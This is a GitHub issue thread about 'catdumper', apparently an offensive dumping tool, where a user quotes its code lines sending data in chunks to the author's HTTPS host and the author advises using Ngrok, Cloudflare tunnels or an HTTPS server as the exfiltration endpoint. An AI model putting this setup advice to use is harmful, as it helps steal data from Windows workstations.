### ISSUE TITLE
Advice

### ISSUE THREAD

**Issue by useragent23253** [Meowmycks/catdumper#1]
Hello, thank you for this project but I'm little stuck on reproduction it. I've changed values in SendDataInChunks(data, "catflask.meowmycks.com", "/upload");	SendHTTPSRequest("catflask.meowmycks.com", "/upload", key, true) to my local ip address but not sure that's correct. My logs are empty after execute exif.py on my ubuntu machine and catdumper.exe on windows workstation.
Could u explain how exactly to do it? My coding skills are bad...

**Comment by Meowmycks** [comment]
Exfil happens over HTTPS. You'd need some kind of way to use HTTPS in your implementation. 

It was much easier to set up an Ngrok tunnel or Cloudflare Argo Tunnel (which does the HTTPS setup for you already), or use the domain of your own web server that has HTTPS set up, than to try to make it work between two local IP addresses. So that's what I coded it to work with.
